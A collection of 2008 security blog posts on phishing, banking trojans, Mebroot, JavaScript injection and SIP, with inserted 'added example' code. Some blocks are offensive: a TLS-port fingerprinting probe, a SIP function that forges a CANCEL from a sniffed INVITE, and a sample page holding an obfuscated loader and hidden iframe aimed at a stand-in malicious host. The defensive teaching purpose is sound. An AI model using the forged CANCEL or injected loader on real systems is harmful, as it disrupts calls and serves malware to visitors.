"Latest security Update Standard 128-bit Upgrade Certificate" - F-Secure Antivirus Research Weblog

October 06, 2008 02:00 PM
When phishing was young, many phishers registered lookalike domains, along the lines of bankofamerika.com, login-chase.com, and paypal-account-verification.com.

Eventually most of the phishing gangs moved on to random domains in far-away countries and just prepended the domain to create host names along the lines of www.bankofamerica.com.444hzjr4zp2b8oacgd.org.ve, www.chase.com.host8.asia, and www.paypal.com.dll-s.eu.
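As an added example (not code from the F-Secure post), here is a small classifier for the two host-name tricks described above: the lookalike registrable domain (bankofamerika.com, login-chase.com) and the brand's own domain prepended as subdomain labels in front of some unrelated registrable domain (www.bankofamerica.com.<random>.org.ve). The brand list and the public-suffix table are constructed for the example; a real tool should take its suffixes from the Public Suffix List.

```python
# Added example: classify a host name against a list of brand domains.
# PUBLIC_SUFFIXES and BRANDS are constructed for the example, not a real suffix list.
PUBLIC_SUFFIXES = {"com", "net", "org", "eu", "asia", "ve", "org.ve", "co.uk"}
BRANDS = ["bankofamerica.com", "chase.com", "paypal.com"]  # the brands named in the post


def split_registrable(host):
    """Return (subdomain labels, registrable domain) using the longest matching public suffix."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            cut = max(i - 1, 0)  # registrable domain = one label in front of the suffix
            return labels[:cut], ".".join(labels[cut:])
    return labels[:-2], ".".join(labels[-2:])  # unknown suffix: fall back to the last two labels


def levenshtein(a, b):
    """Edit distance; one substitution/insertion/deletion is the classic typo-squat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host, brands=BRANDS):
    """Return [(finding, brand)]; an empty list means no brand trick was detected."""
    subs, registrable = split_registrable(host)
    reg_sld = registrable.split(".")[0]
    findings = []
    for brand in brands:
        if registrable == brand:
            continue  # the genuine site: www.bankofamerica.com really is bankofamerica.com
        brand_labels = brand.split(".")
        brand_sld = brand_labels[0]
        n = len(brand_labels)
        # 1. the brand's full domain appears as a run of subdomain labels in front of
        #    somebody else's registrable domain (www.bankofamerica.com.<random>.org.ve)
        if any(subs[k:k + n] == brand_labels for k in range(len(subs) - n + 1)):
            findings.append(("prepended_brand", brand))
        # 2. the registrable second-level label is one edit away from the brand (bankofamerika)
        elif reg_sld != brand_sld and levenshtein(reg_sld, brand_sld) <= 1:
            findings.append(("lookalike", brand))
        # 3. the brand label is embedded in a longer one (login-chase, paypal-account-verification)
        elif brand_sld in reg_sld and len(reg_sld) > len(brand_sld):
            findings.append(("embedded_brand", brand))
    return findings


if __name__ == "__main__":
    for h in ["bankofamerika.com", "login-chase.com", "paypal-account-verification.com",
              "www.bankofamerica.com.444hzjr4zp2b8oacgd.org.ve", "www.chase.com.host8.asia",
              "www.paypal.com.dll-s.eu", "www.bankofamerica.com"]:
        print(h, classify(h))
```

The prepended-brand check is the one that catches the newer style: nothing about the registrable domain looks like a bank, so the only signal is a brand domain sitting in the subdomain labels.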

But every now and then we run into new fraud sites that are using the old school tricks. Like today, when somebody spammed around e-mails such as these:

sbooff.com

The link takes you to sbooff.com, which desperately tries to mimic sboff.com, the official home page of Standard Bank Offshore:

sbooff.com

Do note that this isn't technically a phishing site, as it doesn't try to trick you into entering your details into a fake site. It just tries to convince you to install an "Upgrade Certificate". Which is a program. Which is actually the Trojan-Downloader.Win32.Agent.aiqo banking trojan.

The site has been reported and should be offline soon.

On 06/10/08 At 02:35 PM

Chrome Keeps it simple - SecuriTeam Blogs

October 06, 2008 12:01 PM

Have you tried Chrome? It’s nice! It definitely runs Gmail faster than Firefox, all the rest I’m still checking.

There was one very cool feature I noticed today that I really liked.
Did your Firefox ever show you the message below? (The answer is probably yes)
Have you EVER read it? (I didn’t, and neither did you…)

Now look at the same message, as it looks in Chrome:

I can’t think of a better way to explain it.
Once you click “Proceed anyway” you get to the website you were looking for, but the address bar keeps reminding you that this is not a safe site:

This explanation is a security warning for regular people that are going to shop online. Not for security experts. Explaining security to the ‘regular people’ is hard. This one is perfect.
I think that the person that thought about this feature is brilliant.


Tomcat SSL Fingerprinting - ha.ckers.org web application security lab

October 05, 2008 05:32 PM

I ran into this a few weeks ago and I thought it was just so silly I had to post it. If you telnet to an SSL/TLS enabled port and type in “GET / HTTP/1.0” and hit enter it immediately responds with this rather poorly thought out error message:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Reason: You're speaking plain HTTP to an SSL-enabled server port.<br />
Instead use the HTTPS scheme to access this URL, please.<br />

The irony is that it’s saying that it doesn’t know what I’m saying, even though it clearly does know what I’m saying since it tells me what I’m doing wrong. Pretty stupid error messaging and pretty easy to use to fingerprint the web server. Just thought it was funny enough to pass along.
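As an added example (not the post's own code), here is a probe that sends the same plain-HTTP request to a TLS port and classifies the reply. One caveat worth knowing: the banner text quoted above is the message Apache httpd's mod_ssl returns, which is what you see when Tomcat sits behind an Apache front end; the string is not Tomcat's own, so the reply type, not merely its presence, is the fingerprint. The sample replies in the test are constructed.

```python
# Added example: plain-HTTP probe of a TLS port and a classifier for the reply.
import socket
import sys

PLAIN_HTTP_PROBE = b"GET / HTTP/1.0\r\n\r\n"


def probe(host, port, timeout=5.0):
    """Send plain HTTP to a port that should be TLS and return whatever comes back."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(PLAIN_HTTP_PROBE)
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # some servers neither answer nor close; classify what we have
    return b"".join(chunks)


def classify(response):
    """Label the reply to a plain-HTTP probe of a TLS port."""
    if not response:
        return "closed-or-silent"          # TLS-only endpoint that just drops the connection
    if response[:2] == b"\x15\x03":
        return "tls-alert"                 # a TLS alert record: the stack refused the bytes
    if response.startswith(b"HTTP/"):
        if b"speaking plain HTTP to an SSL-enabled server port" in response:
            return "apache-mod_ssl"        # the banner quoted in the post
        return "http-400-on-tls-port"      # some other server that answers in clear text
    return "unknown"


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    reply = probe(target, port)
    print(classify(reply))
    print(reply[:200])
```

Run it as `python probe.py host 443`; a mod_ssl front end answers in clear text with the quoted page, while a bare TLS listener gives you an alert record or nothing, which is the difference an attacker's scanner keys on.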

My bro's comments on the financial crisis - ADD / XOR / ROL

October 05, 2008 02:23 PM
My brother wrote an article injecting some reality into the discussion about the banking crisis on Spiegel Online. The German version can be seen here. I'll share a short summary of his arguments here (and he'll complain about my distortions later ;).

Short version: The article describes why the situation is less dire than many pundits claim, and explains logical fallacies in commonly-heard arguments.

In the following, here's a summary of his arguments, in the form of "Myth --> Reality":
  1. Myth: The US government is taking on a total of 7000bn in liabilities -- about 5500bn by agreeing to step in for Fannie Mae / Freddie Mac, and about 700bn in papers bought by doing the bailout. This equates to roughly half of US GDP, and since the US is already in debt by about 65% of GDP, this would push the total indebtedness of the US clearly past 100% of GDP. As a result, serious doubts would have to be cast on the US government's ability to repay debts and service interest on debt.
     Reality: Most of the 5500bn are backed by "proper" mortgages of decent quality. It is unclear whether the US government will lose money on the Fannie Mae / Freddie Mac deal at all. Even the 700bn in "toxic assets" the US is willing to buy have some underlying value. Realistic expectations of the total loss for the US government in this deal run in the area of 500bn, which would be less than 3% of GDP -- and therefore not a significant source of problems.
  2. Myth: The liquidity that central banks are injecting into the markets should lead to hyperinflation.
     Reality: The measures to help liquidity in the markets do not increase the money supply in the long run. They are usually short-term credits given to struggling banks for a limited amount of time -- weeks or months. After this time, the borrowing banks have to repay the loans, and the money disappears. At the same time, the willingness of existing banks to lend decreases, thus decreasing the money supply in the economy. The statistics published by central banks show that the actual money supply M2 is growing a lot more slowly at the moment in spite of all the liquidity injections. Since the money supply is only growing very slowly at the moment, the inflationary pressures are low.
  3. Myth: The banking crisis is responsible for the overall slowdown in the EU's economy, and the German government is thus not responsible for having to adjust its growth estimates downwards sharply.
     Reality: Most indicators show that the slowdown started well before the crisis reached its current urgency. The indicators started pointing down much earlier as a result of the heavy increase in energy costs, the appreciation of the euro (and the resulting loss in competitiveness), and Germany's botched reform of accounting rules for writing down investments in equipment. The banking crisis is just the latest "kick" -- but the three previous ones were all known early (and could have been partially corrected).
  4. Myth: This is the mother of all financial crises. This banking crisis is the worst crisis in several generations, going back to the 1930s crash.
     Reality: Dramatic banking crises are more common than we think. Since 1970, the IMF (IWF in the German original) has counted 42 crashes in countries like Argentina, Indonesia, China, Japan, Finland or Norway. In comparison to these crises, the current crisis isn't even very deep or expensive: the Paulson bailout comes at a cost of 700bn, not even 5% of GDP, and only a fraction of this will actually be lost. According to the IMF, the average banking crisis in a country came at a cost of 13% of GDP for that country's taxpayers. The Indonesian crisis even came in at four times this. The big difference from the other crises is that this one has caught on in the world's biggest economy, and as such reaches unknown dimensions in absolute terms.

VoIP Demystified: SIP - Matasano Chargen

October 03, 2008 11:09 PM

This is the first in a series of posts covering VoIP.

There are two separate components to most VoIP implementations:

  • Signalling, which is communicating call setup and details. (Ex: SIP, H.323)
  • Session, which carries the actual media stream and conversation itself. (Ex: RTP)

There are also master/slave protocols that incorporate signalling, but directly control the client hardware or software. With this, the handset or softphone is a dumb terminal where keypresses are sent directly to the host which controls the display and indicator lights. Examples include Nortel’s UNISTIM, and Cisco’s Skinny Client Control Protocol (SCCP).

With this in mind, we can classify VoIP endpoint philosophies as follows:

  • Peer to peer - with more intelligence in the phones themselves, and using SIP or H.323, the phone can negotiate and initiate calls on its own.
  • Dumb endpoints - calls are initiated and negotiated on behalf of the endpoint by the controlling host, the PBX.

In this post, I am going to be focusing on and attempting to distill the essentials of SIP, demystifying it for the security audience who wishes to work with it.

How VoIP Saved The Day

One day, Mario was on his way to visit Princess Peach at her invitation. He saw her standing outside of the Warp Pipe that led to her Castle. He waved at her. She waved back.

And then, oh no! Bowser’s minions snatched her away!

But fortunately, the Mushroom Kingdom was recently wired for WiFi. So Mario whips out his wireless SIP phone. He calls Toadstool, Peach’s loyal servant. Toadstool is on the local wireless network. Mario pushes the speed dial button for Toadstool, which has Toadstool’s domain name.

DNS Resolution

Once this has been resolved to an IP address, SIP handshaking happens. SIP is transport independent but is usually carried over UDP. SIP messages are text based, on the theory that text is easier to monitor and diagnose, and the request/response messaging is modelled closely on HTTP.

Simple SIP Handshake

First, Mario’s phone sends a SIP INVITE to Toadstool’s phone. It identifies who is calling and how to contact the caller, and its SDP body names the IP address and port on which the caller will receive media. Toadstool’s phone responds with a ‘100 Trying’ and then a ‘180 Ringing’ message. When Toadstool answers the phone, it sends a ‘200 OK’ message, whose own SDP body names his side's media address and port. When Mario’s phone receives the OK message, it sends an ACK back. Once this happens, voice on each end is sent to the other via RTP over UDP using the IP addresses and ports exchanged during the SIP transaction.

“Oh, no!” cried Mario to Toadstool, “Bowser’s minions kidnapped Princess Peach!”

“Again?! We have to teach her how to defend herself. She just hasn’t been herself since Super Mario Brothers 2,” replied Toadstool, “I’ll round everyone up. Luigi is away at the Mario Kart Racing Track though.”

“All right! I’ll call him,” replied Mario to Toadstool and then hung up.

Now, for those of you readers who are rooting for Bowser, was he smart enough to realize that you can spoof UDP packets and CANCEL a call before Toadstool could answer? Or did he understand that SIP packets can be intercepted on a local network, and he could set himself up as the man in the middle? Unfortunately for those of you inclined to cheer for the villain, he is a giant turtle of habit. Body snatching and sending minions out is the extent of his technique.

A pity, for if he had sent out countless INVITE packets on the Mushroom Kingdom network, he could have shut down the entire phone system and gotten away clean with Princess Peach.
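As an added example (not code from the Matasano post), here is a minimal SIP message builder and parser that replays the INVITE / 100 / 180 / 200 / ACK exchange from the simple handshake above and then shows why the spoofed CANCEL that Bowser never thought of works: a CANCEL is matched to the pending INVITE by headers that any sniffer on the local network can read. All addresses, tags, Call-IDs and SDP bodies are constructed for the example.

```python
# Added example: SIP INVITE transaction and a CANCEL forged from a sniffed INVITE.
CRLF = "\r\n"


def sdp(ip, port):
    """Minimal SDP body; the m= line tells the peer where to send RTP (constructed)."""
    return CRLF.join(["v=0", f"o=- 1 1 IN IP4 {ip}", "s=call", f"c=IN IP4 {ip}",
                      "t=0 0", f"m=audio {port} RTP/AVP 0"]) + CRLF


def parse(raw):
    """Split a SIP message into (start line, {lower-case header: [values]}, body)."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def build_request(method, uri, via, hdr_from, hdr_to, call_id, cseq, body=""):
    """Serialise a request with the headers RFC 3261 section 8.1.1 requires."""
    lines = [f"{method} {uri} SIP/2.0", f"Via: {via}", "Max-Forwards: 70",
             f"From: {hdr_from}", f"To: {hdr_to}", f"Call-ID: {call_id}",
             f"CSeq: {cseq} {method}", f"Content-Length: {len(body)}"]
    if body:
        lines.insert(-1, "Content-Type: application/sdp")
    return CRLF.join(lines) + CRLF + CRLF + body


def build_response(code, reason, request_raw, to_tag=None, body=""):
    """Responses copy Via, From, To, Call-ID and CSeq from the request (RFC 3261 8.2.6.2)."""
    _, h, _ = parse(request_raw)
    to = h["to"][0] + (f";tag={to_tag}" if to_tag else "")
    lines = [f"SIP/2.0 {code} {reason}"] + [f"Via: {v}" for v in h["via"]]
    lines += [f"From: {h['from'][0]}", f"To: {to}", f"Call-ID: {h['call-id'][0]}",
              f"CSeq: {h['cseq'][0]}", f"Content-Length: {len(body)}"]
    if body:
        lines.insert(-1, "Content-Type: application/sdp")
    return CRLF.join(lines) + CRLF + CRLF + body


def kind(raw):
    """'INVITE', 'ACK', ... for a request; the status code for a response."""
    start = parse(raw)[0].split()
    return start[1] if start[0] == "SIP/2.0" else start[0]


def rtp_port(raw):
    """Audio port advertised in the SDP body of an INVITE (offer) or 200 OK (answer)."""
    for line in parse(raw)[2].splitlines():
        if line.startswith("m=audio "):
            return int(line.split()[1])
    return None


def simulate_call():
    """Mario (10.0.0.5) calls Toadstool (10.0.0.9) directly, as in the first handshake."""
    mario, toad = "sip:mario@10.0.0.5", "sip:toadstool@10.0.0.9"
    via = "SIP/2.0/UDP 10.0.0.5:5060;branch=z9hG4bK776asdhds"  # branch identifies the transaction
    call_id = "a84b4c76e66710@10.0.0.5"
    invite = build_request("INVITE", toad, via, f"<{mario}>;tag=1928301774", f"<{toad}>",
                           call_id, 1, sdp("10.0.0.5", 49170))
    trying = build_response(100, "Trying", invite)
    ringing = build_response(180, "Ringing", invite, to_tag="a6c85cf")
    ok = build_response(200, "OK", invite, to_tag="a6c85cf", body=sdp("10.0.0.9", 5004))
    _, okh, _ = parse(ok)
    # The ACK for a 2xx is its own transaction (new branch); it reuses the INVITE's CSeq
    # number and carries the To tag the callee chose (RFC 3261 13.2.2.4).
    ack = build_request("ACK", toad, "SIP/2.0/UDP 10.0.0.5:5060;branch=z9hG4bKnashds8",
                        okh["from"][0], okh["to"][0], call_id, 1)
    exchange = [("mario", invite), ("toadstool", trying), ("toadstool", ringing),
                ("toadstool", ok), ("mario", ack)]
    return {"transcript": [(who, kind(msg)) for who, msg in exchange],
            "invite": invite,
            "rtp": (rtp_port(invite), rtp_port(ok))}  # media then flows to these two ports


def forge_cancel(sniffed_invite):
    """Bowser's CANCEL: RFC 3261 9.1 says CANCEL copies the Request-URI, Call-ID, To, From,
    the INVITE's top Via (same branch) and the CSeq number; it needs no credentials."""
    start, h, _ = parse(sniffed_invite)
    return build_request("CANCEL", start.split()[1], h["via"][0], h["from"][0],
                         h["to"][0], h["call-id"][0], h["cseq"][0].split()[0])


def cancel_matches(cancel_raw, invite_raw):
    """Callee side: a CANCEL is matched to the pending INVITE transaction by the top Via
    branch and sent-by plus the CSeq number (RFC 3261 17.2.3); the source IP is not checked,
    so a spoofed UDP datagram is enough to kill the call before it is answered."""
    cs, ch, _ = parse(cancel_raw)
    _, ih, _ = parse(invite_raw)
    return (cs.startswith("CANCEL ") and ch["via"][0] == ih["via"][0]
            and ch["cseq"][0].split()[0] == ih["cseq"][0].split()[0])


if __name__ == "__main__":
    call = simulate_call()
    print(call["transcript"], call["rtp"])
    print("forged CANCEL accepted:", cancel_matches(forge_cancel(call["invite"]), call["invite"]))
```

Everything `forge_cancel` needs is in the INVITE that crossed the wire in clear text, which is the whole point of the attack: on a shared network segment, reading one packet and spoofing one UDP datagram is enough to tear down a call that has not yet been answered.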

Since Luigi was outside the Cloud Kingdom, when Mario dialed for Luigi, his phone talked to the Mushroom Kingdom SIP Proxy.
Proxy SIP Handshake

The SIP Proxy does resolution for the address provided, which was luigi@mushroom. When Luigi went to the Mario Kart Racetrack, his phone registered itself with the Mushroom Kingdom SIP Proxy. When it registered, it let the proxy know what its IP address is and how to contact it.

So when Mario called Luigi, the SIP proxy resolved the address using Luigi’s REGISTER information, and the standard SIP handshake was passed back and forth through it. Where it gets complicated is the RTP streams: the Mushroom Kingdom could be using a STUN server as well, or its infrastructure could be SIP aware and open ports accordingly on the Mushroom Kingdom firewall.

“Luigi!” Mario exclaimed and could hear his brother’s kart roaring, “Princess Peach has been kidnapped by Bowser!” And with that, Luigi veered off the race track in pursuit of Bowser’s minions.

Those that are more fond of turtles than plumbers would be saddened to note that Bowser could have impersonated Luigi on the SIP proxy if he had stolen his credentials. Or Bowser could have spoofed Luigi’s IP address, and Mario’s brother would have kept racing on.

Using the superior communications network, they were able to catch up with Bowser’s koopas and jump on their heads. Mario was rewarded by a kiss from Princess Peach!

The End

I hope you enjoyed reading the story as much as I enjoyed writing it. I hope that this will clarify SIP for some of my readers, and open your eyes as to some of the attack vectors inherent in SIP.

All characters and places used are copyrighted by Nintendo.

The background sprites are credited to GordonBlazin@aol.com

The character sprites are credited to davidjclarke@gmail.com

The 15th - F-Secure Antivirus Research Weblog

October 03, 2008 12:30 PM
Greetings from Ottawa.

VB

The antivirus industry's most important annual conference — Virus Bulletin — is in full swing.

VB

It seems incredible but this is my 15th VB — and I have the card to prove it!

VB  VB

Pretty much everybody is here — as can be seen from this excellent video shot by the Sophos gang. The video was shown in the annual gala dinner last night — be sure to check it out.

This year, we had our Kimmo Kasslin deliver a presentation on the opening day of the conference.

Kimmo Kasslin

The audience seemed quite astonished to hear the full story behind the most advanced malware we've seen so far: Mebroot. Kimmo characterized it as a "Commercial-grade framework" and as a "Malware Operating system".

The research needed to fully understand this malware was done as a joint operation between F-Secure and Symantec. Our fellow, Kimmo, worked together with Elia Florio from Symantec Security Response in this great example of cross-industry co-operation.

Details of Mebroot functionality uncovered in the presentation included:

  • Mebroot is the most advanced and stealthiest malware seen so far
  • It operates at the lowest level of the Windows operating system
  • Mebroot writes its startup code to the first physical sector on the hard drive (the Master Boot Record)
  • When an infected machine is started, Mebroot loads first and survives through the Windows boot
  • Mebroot hides all changes made to the infected system
  • It heavily uses undocumented features of Windows
  • It creates a complex network communication system, involving pseudo random domain names
  • Large parts of the code are highly obfuscated
  • Mebroot uses a very complex installation mechanism, trying to bypass security products and to make automatic analysis harder
  • All botnet communication is encrypted with an advanced encryption mechanism
  • The malware has apparently gone through extensive quality assurance. It never seems to crash the systems it infects, even though it runs at the kernel level
  • The Mebroot gang has so far registered around 1000 com/net/biz domain names for their communication needs
  • The botnet backdoor functionality is very powerful, even allowing the upload and execution of arbitrary kernel-mode modules
  • As a payload, Mebroot attacks over 100 European online banks, trying to steal money as users do their online banking on infected machines


The authors of Mebroot remain unknown at this time. However, it's obvious they are well organized and well funded.

To download the slide set prepared by Kimmo and Elia, click on the image below.

Kimmo Kasslin & Elia Florio

Signing off,
Mikko

P.S. This would seem like a great opportunity to plug another conference: T2 will be held in Helsinki later this month and Kimmo will be talking there as well, on the Evolution of Kernel-Mode Malware. The agenda as a whole looks very good, take a look.

T2

On 03/10/08 At 01:08 PM

My name is Elvis Presley and here is my RFID passport - SecuriTeam Blogs

October 02, 2008 09:37 PM

The group using the name The Hacker’s Choice has managed to clone a biometric passport in the name of Elvis Presley. Right - The King who died 31 years ago :-)
Demonstration video and some technical information here.


JavaScript Injection Attack - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
JavaScript injection attacks seem to be the in thing these days. Malware writers are increasingly utilizing such attacks as a better means to spread their work.

As little as a year ago, the bad guys were dependent on enticing people to follow links that pointed to malicious websites (via e-mail, search links, or IM worms). Today, they are using JavaScript injection attacks to simply "steal" a website's visitors, and it has become something of a Swiss Army Knife for underground hackers to spread their malware worldwide.

JS Injection

We've seen numerous high traffic, legitimate websites attacked using this technique. One recent example is MegaGames, a very popular U.S. gaming portal with an Alexa rank of 3172. The attackers compromised one of MegaGames' servers and inserted a couple of extra lines of code into its pages. This addition redirects unsuspecting visitors to a malicious European site where the main infection attempts are carried out.

The malicious site attempts two different methods to attack its visitors. The first is an attempt to exploit a Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerability (MS06-014).

JS Attack

This attack only affects visitors using Internet Explorer (IE) without the MS06-014 patch: the page instantiates the RDS.Dataspace ActiveX control and abuses a flaw in how that control interacts with IE to give remote attackers complete control over the victim's system.

The second attack attempted is a drive-by download, which affects not only IE but also Firefox 1.0 and 2.0. It uses JavaScript to detect the browser type, then uses Adobe Flash exploits to download and execute a malicious binary on the system.

Flash Exploits
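As an added example (not from the F-Secure post), here is a scanner for the kind of injection described above: a script or iframe reference slipped into an otherwise legitimate page that hands visitors to a host the site does not own. The sample page, its host names and the injected tags are constructed; the real MegaGames code is not reproduced here.

```python
# Added example: find injected script/iframe references in a page's HTML.
from html.parser import HTMLParser
from urllib.parse import urlparse
import re


class InjectionScanner(HTMLParser):
    """Flag script/iframe references that hand the visitor to a host the site does not own."""

    def __init__(self, site_host, allowed_hosts=()):
        super().__init__()
        self.site_host = site_host.lower()
        self.allowed = {h.lower() for h in allowed_hosts}  # CDNs and ad networks you know about
        self.findings = []
        self._script_text = None  # collects inline script text while inside <script>

    def _offsite(self, url):
        host = (urlparse(url).hostname or "").lower()
        return bool(host) and host != self.site_host \
            and not host.endswith("." + self.site_host) and host not in self.allowed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._script_text = []
            if self._offsite(a.get("src") or ""):
                self.findings.append(("offsite-script", a["src"]))
        elif tag == "iframe":
            src = a.get("src") or ""
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or "display:none" in style or "visibility:hidden" in style)
            if hidden:
                self.findings.append(("hidden-iframe", src))
            elif self._offsite(src):
                self.findings.append(("offsite-iframe", src))

    def handle_data(self, data):
        if self._script_text is not None:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_text is not None:
            text = "".join(self._script_text)
            self._script_text = None
            # the classic injected loader: decode an escaped blob and write it into the page
            if re.search(r"document\.write\s*\(\s*unescape\s*\(", text) \
                    or len(re.findall(r"%[0-9a-fA-F]{2}", text)) > 20:
                self.findings.append(("obfuscated-inline-script", text[:60]))


def scan(html, site_host, allowed_hosts=()):
    """Return [(finding, reference)] for the page; an empty list means nothing suspicious."""
    p = InjectionScanner(site_host, allowed_hosts)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: a legitimate page with one injected loader and its hidden iframe.
SAMPLE_PAGE = """<html><head><title>MegaGames</title>
<script src="/js/site.js"></script>
<script src="http://ads.example-cdn.net/ad.js"></script>
</head><body><h1>News</h1>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//evil.example.eu/in.php%22%3E'));</script>
<iframe src="http://evil.example.eu/in.php" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_PAGE, "megagames.example", allowed_hosts=["ads.example-cdn.net"]):
        print(*finding)
```

Run it over a copy of your own pages fetched from a clean client and keep the allow-list short; the injected lines in these attacks are typically a single off-site script or a zero-sized iframe appended to a template, which is exactly what the two checks look for.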

The MegaGames website is currently still compromised and its misfortune illustrates a good point. Many Internet users are under the impression that they can only get infected with malware if they visit "obviously risky" (dodgy) websites, such as "pr0n" or "warez" sites. Unfortunately, that's not true. Malware writers have been getting more sophisticated and today, even legitimate news or business sites can get surreptitiously compromised.

Another good example that no site is safe — BusinessWeek.com — a very legitimate and high traffic site. It has fallen victim to an SQL Injection attack, and such attacks inject JavaScript…

The Register has more details.

Web Security team post by — Choon Hong

On 18/09/08 At 09:13 AM

Upcoming National Inter Varsity Security Tech Quiz Championship - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
We've been investing a lot of time recently in a Security Awareness Drive at local university campuses, to create more awareness about information security issues in Malaysia.

On the Security Awareness Drive

So far, the response from the students has been encouraging. Still, we wanted more students to get interested in this field, both academically and career-wise — so we thought, what better way to do it than to use information security as the topic for a competition where the grand prize is a paid trip to Helsinki, Finland, complete with a brand spankin' new laptop?

To that end, we've been involved in organizing the upcoming Malaysian National Inter Varsity Security Tech Quiz Championship, which will take place towards the end of 2008. The competition is open to teams of students from all private and public universities in Malaysia, who will compete through four rounds of increasingly tough questioning. Teams will be eliminated in each round, until one team of four students is left standing in the grand finale — and then it's off to Finland they go!

To win a round, the teams need to correctly answer questions revolving around security for mobile phones, desktops and laptops, and online threats. Practically, the questions will include everything from general security terms to landmark events in computer security history, malware characteristics and computer trivia. If we feel the teams are having too easy a time, we even have a list of "Almost Impossible" questions to throw in, to make things more interesting! We're looking forward to the Tech Quiz Championship and will probably post an update nearer to the event date.

On 15/09/08 At 02:36 AM

Spam.KML - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
Where does today's batch of spam and phishing come from?

Let's plot them out with Google Earth.

Phishing

You can download today's KML data file from: spam and phishing 2008.09.12 (3731k file).

On 12/09/08 At 02:35 PM

Fore! - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
Holo is one of our Database Update Publishers (DUP).

This is him:

Ready for the 2008 Golf Tournament

He's out this afternoon taking part in the Helsinki office's annual golf tournament.

So who's publishing the AV database updates in the meantime???

Azidin, one of the DUPs from our Kuala Lumpur team. He's been working remotely with the Helsinki shift today.

So we just realized something, September 13th will mark our Malaysian office's two year anniversary.

Working with counterparts from across the world has become second nature to us since then…

Good luck to Holo and thanks to Azidin!

On 11/09/08 At 04:09 PM

What's The Latest Buzz? - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
The 2008 US Presidential Election is well on its way, and what news could be more enticing than an alleged sex scandal involving one of the candidates?

The latest e-mail spam run on the loose contains a link to a supposed pornographic video of Democratic candidate Senator Barack Obama.

In order to conceal the trojan's primary intent, a pornographic video is opened once the file is downloaded and executed. Along with the video, named 01.wmv, the trojan drops another malicious file onto the system called 809.exe. Next, it registers the file siemens32.dll as a Browser Helper Object (BHO).

As a result, the malicious BHO is loaded every time Internet Explorer is launched. As soon as the user connects to specific banking sites, especially well-known banks in Germany, the trojan collects the information from the bank transactions and posts it to a site posing as the "Medved Hotel" in Finland.

Medved Hotel

Interestingly, there is no Medved Hotel in Finland. The website, however, looks real enough to fool unsuspecting users and the layout was apparently borrowed from a real Finnish Hotel, Bear Inn, in order to make a bogus site out of it.

Hotel Bear Inn

Can you spot the difference? Both the websites are almost the same except for the discrepancy on the right side of the page.

Currently, we have reported this to local authorities and they are working on getting the site shut down. All of the malicious files mentioned are detected as Trojan-Spy:W32/Banker.ISO.

Response Team post by — Mark

On 10/09/08 At 06:25 AM

Trustworthy Domain - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
So, let's say you get an e-mail from your bank, asking to confirm your details.

You follow the link and end up at a site such as this:

1direct

Looks good.

Let's have a closer look at the domain information.

1direct

Turns out the bank site is hosted in Hong Kong. Which is not itself suspicious, I guess…

And the domain was registered yesterday. That could be a coincidence.

The nameservers of the site are hsiaf5978.com, fgtvj4737.com and hsa9gdfg3.com…erm…which isn't necessarily a bad thing.

And the administrator's e-mail address is newlolita2008@gmail.com. Ho hum.

Avoid.

On 09/09/08 At 12:46 PM

Inside-Out Improvements - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
Our 2009 consumer products were officially launched last Wednesday and there are a number of technological enhancements within.

The lab has been busy working with core improvements inside our scanning engines for several months now, and we are very satisfied to see it yielding results so soon.

We scored very well in AV-Test.org's latest results. More importantly, we're improving on our own already good results.

2009's scanning engines detect more, and do it faster.

From AV-Test.org:

F-Secure 2008 & 2009 results

"Outside" improvements have been implemented as well.

Our marketing team did some research for the 2009 packaging and developed a better box.

Dr. Tuula Pohjola of the Helsinki University of Technology was approached to perform a life cycle assessment (LCA). Keep an eye on the pressroom for the full details, coming soon.

For now, the basic details are as such — on-demand digital production techniques, local raw materials, plant-based inks, and it's easily recycled. Very nice.

It looks very nice too, as seen in this photo with two of our Helsinki office employees, Weronika and Niina.

Weronika and Niina with Internet Security 2009 and Anti-Virus 2009

Eco Friendly

You can find more pictures (of the boxes) from our marketing pages.

On 08/09/08 At 11:49 AM

John Doe is a Criminal Mastermind - F-Secure Antivirus Research Weblog

October 01, 2008 11:30 PM
WinDefender 2008 was the subject of yesterday's post. It's a rogue security application, and part of an ever increasing consumer scam.

A search for "Really Legal Stuff" ties WinDefender 2008 to Antivirus XP 2008, another persistent and very nasty rogue.

Rogue WinDefender 2008 and Antivirus XP

Here's another *really* related rogue, Spyware Guard 2008.

Rogue SpywareGuard 2008 - Really Legal Stuff

Spyware Guard 2008's legal page makes references to Pandora Software.

There are other rogue websites that refer to Pandora Software, and claim it to be located in Dortmund, Germany with a support contact of Oleg Dvorezky. Right… sure.

